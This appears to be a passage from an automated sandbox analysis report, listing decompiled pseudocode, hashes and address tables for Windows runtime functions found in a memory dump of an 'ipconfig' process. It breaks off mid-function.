              0x02f16fae
              0x02f16fba
              0x02f16fbb
              0x02f16fbc
              0x02f16fc1
              0x02f16fc2
              0x02f16fd3
              0x02f16fd8
              0x02f16fd8
              0x02f16fdf
              0x02f16fe8
              0x02f16fee
              0x02f16fee
              0x02f16ff5
              0x02f16ffb
              0x02f16ffb
              0x02f17004
              0x00000000
              0x02f1700a
              0x02f17004
              0x02f16eb3
              0x02f16e9c
              0x02f17015

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
              • Instruction ID: 02c34c98ccee29e7e5312389d1a64c7d631c5074f497b93387fde1decb842c9c
              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
              • Instruction Fuzzy Hash: 54716E71E00219AFCB11DFA4C984AEEFBB9FF48754F504569E605E7250DB30AA41CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E952A5 Relevance: .2, Instructions: 161COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E02E952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E02EAEEF0(0x2f879a0);
					_t104 =  *0x2f88210; // 0x402bd8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E02EAEB70(_t93, 0x2f879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E02ED9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E02EAEEF0(0x2f879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E02EAEB70(0, 0x2f879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x402bf002
								_t13 = _t104 + 0xc; // 0x402be5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E02ECF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E02EAEEF0(0x2f879a0);
									__eflags =  *0x2f88210 - _t104; // 0x402bd8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x2f88210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000402b
											_t95 =  *((intOrPtr*)( *_t37));
											E02F14888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E02EAEB70(_t95, 0x2f879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E02ED95D0();
											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E02ED95D0();
											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E02EAEB70(_t93, 0x2f879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E02ED95D0();
										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E02ED95D0();
										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000402b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x402bf002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E02ECF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























              0x02e952a5
              0x02e952ad
              0x02e952b0
              0x02e952b3
              0x02e952b7
              0x02e952ba
              0x02e952bf
              0x02e952c4
              0x02e952cc
              0x00000000
              0x00000000
              0x02e952ce
              0x02e952d1
              0x02e952d9
              0x02e952dd
              0x02e952e7
              0x02e952f7
              0x02e952f9
              0x02e952fd
              0x02ef0dcf
              0x02ef0dd5
              0x02ef0dd6
              0x02ef0dd7
              0x02ef0dd8
              0x02ef0dd9
              0x02ef0dde
              0x02ef0ddf
              0x02ef0de0
              0x02ef0de1
              0x02ef0de2
              0x02ef0de2
              0x02ef0de5
              0x02ef0dea
              0x02ef0dec
              0x02ef0f60
              0x02ef0f64
              0x02ef0f70
              0x02ef0f76
              0x02ef0f79
              0x02ef0f79
              0x00000000
              0x02ef0f64
              0x02ef0df2
              0x02ef0df7
              0x02ef0e04
              0x02ef0e04
              0x02ef0e0d
              0x02ef0e0d
              0x02ef0e10
              0x02ef0e1a
              0x02ef0e1c
              0x02ef0e4c
              0x02ef0e52
              0x02ef0e61
              0x02ef0e67
              0x02ef0e6b
              0x02ef0e70
              0x02ef0e76
              0x02ef0ed7
              0x02ef0edc
              0x02ef0ee0
              0x02ef0ee6
              0x02ef0eea
              0x02ef0eed
              0x02ef0ef0
              0x02ef0ef3
              0x02ef0ef6
              0x02ef0ef9
              0x02ef0efb
              0x02ef0efe
              0x02ef0f01
              0x02ef0f01
              0x02ef0f0b
              0x02ef0f12
              0x02ef0f16
              0x02ef0f18
              0x02ef0f18
              0x02ef0f1b
              0x02ef0f2c
              0x02ef0f31
              0x02ef0f31
              0x02ef0f35
              0x02ef0f39
              0x02ef0f3a
              0x02ef0f3c
              0x02ef0f3c
              0x02ef0f3f
              0x02ef0f50
              0x02ef0f55
              0x02ef0f55
              0x02ef0f59
              0x02e952eb
              0x02e952f1
              0x02e952f1
              0x02ef0e7d
              0x02ef0e84
              0x02ef0e88
              0x02ef0e8a
              0x02ef0e8a
              0x02ef0e8d
              0x02ef0e9e
              0x02ef0ea3
              0x02ef0ea3
              0x02ef0ea7
              0x02ef0eaf
              0x02ef0eb3
              0x02ef0eb9
              0x02ef0eb9
              0x02ef0ebc
              0x02ef0ecd
              0x02ef0ecd
              0x00000000
              0x02ef0eb3
              0x02ef0e1e
              0x02ef0e21
              0x02ef0e25
              0x02ef0e2b
              0x02ef0e2f
              0x02ef0e30
              0x02ef0e3a
              0x02ef0e3f
              0x02ef0e41
              0x00000000
              0x00000000
              0x02ef0e47
              0x00000000
              0x02ef0e47
              0x02ef0df9
              0x02ef0dfe
              0x00000000
              0x00000000
              0x00000000
              0x02ef0dfe
              0x02e95303
              0x02e95307
              0x00000000
              0x02e95309
              0x00000000
              0x02e95309
              0x02e95307
              0x02e952e9
              0x02e952e9
              0x00000000
              0x02e952e9
              0x02e9530e
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7c07da043e10b617b906a6a28664710e33a316e6a50c16f35d320656eb2ad32
              • Instruction ID: 6c2a0702aaf429b7ad3288f4e24a502c83a484925fce46306af111fc209465b3
              • Opcode Fuzzy Hash: f7c07da043e10b617b906a6a28664710e33a316e6a50c16f35d320656eb2ad32
              • Instruction Fuzzy Hash: E651FE31285341ABD722EF24C851B27FBE5FF84714F24992EF59987A51E770E804CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC2AE4 Relevance: .2, Instructions: 159COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x2f88204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x2f88208; // 0x2f88207
				_t8 = _t57 + 0x2f88208; // 0x2f88207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x2f88450; // 0x4010fc
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x2f8821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x2f86d5c; // 0x7f250654
							_t72 =  *0x2f86d5c; // 0x7f250654
							_t75 =  *0x2f86d5c; // 0x7f250654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x2f86d5c; // 0x7f250654
							_t84 =  *0x2f86d5c; // 0x7f250654
							_t87 =  *0x2f86d5c; // 0x7f250654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E02EDF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































              0x02ec2ae4
              0x02ec2aec
              0x02ec2aef
              0x02ec2af4
              0x02ec2af7
              0x02ec2afd
              0x02ec2b92
              0x02ec2b92
              0x02ec2b97
              0x02ec2b9c
              0x02ec2b9c
              0x02ec2b03
              0x02ec2b06
              0x02ec2b09
              0x02ec2b09
              0x02ec2b0f
              0x02ec2b15
              0x02ec2b15
              0x02ec2b1b
              0x02ec2b1e
              0x02ec2b21
              0x02ec2b26
              0x02ec2b29
              0x02ec2b81
              0x02ec2b84
              0x02ec2c0e
              0x02ec2c15
              0x02ec2c24
              0x02ec2c24
              0x02ec2b8a
              0x02ec2b8a
              0x02ec2b8a
              0x02ec2b8a
              0x02ec2b90
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ec2b4a
              0x02ec2b4a
              0x02ec2b4d
              0x02ec2b53
              0x00000000
              0x00000000
              0x02ec2b55
              0x02ec2b58
              0x02ec2bb7
              0x02f05d1b
              0x02f05d37
              0x02f05d47
              0x02f05d53
              0x02ec2bbd
              0x02ec2bbd
              0x02ec2bbd
              0x02ec2bb7
              0x02ec2b5d
              0x02ec2c2f
              0x02f05d5b
              0x02f05d77
              0x02f05d87
              0x02f05d93
              0x02ec2c35
              0x02ec2c35
              0x02ec2c35
              0x02ec2c2f
              0x02ec2b65
              0x02ec2b9f
              0x02ec2ba2
              0x02ec2b67
              0x02ec2b67
              0x02ec2b69
              0x02ec2b6b
              0x02ec2b6e
              0x02ec2bc9
              0x02ec2bcc
              0x02ec2bcf
              0x02ec2bd4
              0x02ec2bd6
              0x02ec2bd6
              0x02ec2bdb
              0x02ec2c02
              0x02ec2c05
              0x02ec2c07
              0x00000000
              0x02ec2c07
              0x02ec2be0
              0x02ec2c00
              0x02ec2c3f
              0x02ec2c3f
              0x00000000
              0x02ec2c00
              0x02ec2be5
              0x02ec2be7
              0x02ec2bec
              0x02ec2bf4
              0x02ec2bf6
              0x00000000
              0x02ec2bf6
              0x02ec2b70
              0x02ec2b76
              0x02ec2b2b
              0x02ec2b2b
              0x02ec2b2d
              0x02ec2b2f
              0x02ec2b32
              0x02ec2b35
              0x02ec2b3a
              0x00000000
              0x02ec2b40
              0x02ec2b43
              0x02ec2b45
              0x02ec2b47
              0x02ec2b4a
              0x02ec2b4d
              0x02ec2b53
              0x00000000
              0x00000000
              0x00000000
              0x02ec2b53
              0x02ec2b78
              0x02ec2b78
              0x02ec2b7b
              0x02ec2b7e
              0x00000000
              0x02ec2b7e
              0x02ec2b76
              0x02ec2ba5
              0x02ec2ba5
              0x02ec2ba8
              0x02ec2bad
              0x00000000
              0x00000000
              0x02ec2baf
              0x02ec2baf
              0x02ec2bc2
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44c59c5d846d88f33473eb7f75186afdce118e6e3988fb62e224e0ae2bf3fbc6
              • Instruction ID: f8bcbe2c46f96ece2508641c84dee14193e93dbf667d9673d4f9b83903d9bc27
              • Opcode Fuzzy Hash: 44c59c5d846d88f33473eb7f75186afdce118e6e3988fb62e224e0ae2bf3fbc6
              • Instruction Fuzzy Hash: 2F51CF76A405198FCB18CF69C9A09BDB7B1FB88704726D45EED46DB310E730AE52CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5AE44 Relevance: .2, Instructions: 152COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E02F5AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E02F5C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E02F5ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E02F5FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E02F5EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E02EB7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E02F51608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E02F61536(0x2f88ae4, (_t74 -  *0x2f88b04 >> 0x14) + (_t74 -  *0x2f88b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L02F5C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E02F5A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E02F3CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E02F5ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















              0x02f5ae44
              0x02f5ae4c
              0x02f5ae53
              0x02f5ae55
              0x02f5ae5c
              0x02f5ae64
              0x02f5ae68
              0x02f5ae75
              0x02f5ae75
              0x02f5ae78
              0x02f5ae7a
              0x02f5ae7c
              0x02f5ae7f
              0x02f5aea8
              0x02f5aeab
              0x02f5aead
              0x00000000
              0x00000000
              0x02f5aeb3
              0x02f5aeb8
              0x02f5aebb
              0x02f5aebd
              0x00000000
              0x02f5ae81
              0x02f5ae88
              0x02f5ae8f
              0x02f5ae9b
              0x02f5ae96
              0x02f5ae96
              0x02f5ae96
              0x02f5aea0
              0x02f5aea3
              0x02f5aebf
              0x02f5aebf
              0x02f5aec3
              0x02f5aec9
              0x02f5af0d
              0x02f5af14
              0x02f5af3d
              0x02f5af3d
              0x02f5af41
              0x02f5af44
              0x02f5af67
              0x02f5af67
              0x02f5af6a
              0x02f5afca
              0x02f5afd1
              0x00000000
              0x02f5afd1
              0x02f5af6c
              0x02f5af6d
              0x02f5af75
              0x02f5af7c
              0x02f5af7e
              0x02f5af80
              0x02f5af85
              0x02f5af87
              0x02f5af99
              0x02f5af89
              0x02f5af92
              0x02f5af92
              0x02f5af9e
              0x02f5afa1
              0x02f5afa3
              0x02f5afa9
              0x02f5afb0
              0x02f5afb2
              0x02f5afb4
              0x02f5afbc
              0x02f5afbc
              0x02f5afb4
              0x02f5afb0
              0x00000000
              0x02f5afa1
              0x02f5af4f
              0x02f5af57
              0x02f5af5c
              0x02f5af5e
              0x00000000
              0x00000000
              0x02f5af60
              0x02f5af64
              0x02f5af64
              0x00000000
              0x02f5af64
              0x02f5af1a
              0x02f5af25
              0x00000000
              0x00000000
              0x02f5af27
              0x02f5af28
              0x02f5af33
              0x00000000
              0x02f5aed0
              0x02f5aed0
              0x02f5aed2
              0x02f5aee1
              0x02f5aee4
              0x00000000
              0x00000000
              0x02f5aee6
              0x02f5aeec
              0x00000000
              0x00000000
              0x02f5aefb
              0x02f5af07
              0x02f5afd3
              0x02f5afdb
              0x02f5afdb
              0x00000000
              0x02f5af07
              0x02f5aed6
              0x02f5aed8
              0x02f5aedf
              0x00000000
              0x00000000
              0x00000000
              0x02f5aedf
              0x02f5aec9

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 895722233523a7e4bc41d0097df45c2d9e835927447e502f0730d03ca9b5cc0f
              • Instruction ID: d902b72b3393163e7868abed84a7c0bbb1904a9d8aefab9a0ea316248f4ade63
              • Opcode Fuzzy Hash: 895722233523a7e4bc41d0097df45c2d9e835927447e502f0730d03ca9b5cc0f
              • Instruction Fuzzy Hash: F741E572B006215BC7269A26CC94B3BB7DAAF847E4F044319FF5687290D734D821CAA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBDBE9 Relevance: .1, Instructions: 149COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E02EBDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E02E9CC50(E02E94510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E02EB7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E02F68ED6(_t102, _t98);
						}
						_t76 = _v44;
						E02EB2280(_t58, _v44);
						E02EBDD82(_v44, _t102, _t98);
						E02EBB944(_t102, _v5);
						return E02EAFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x2f88628; // 0x0
							_v28 = _t67;
							_t68 =  *0x2f8862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
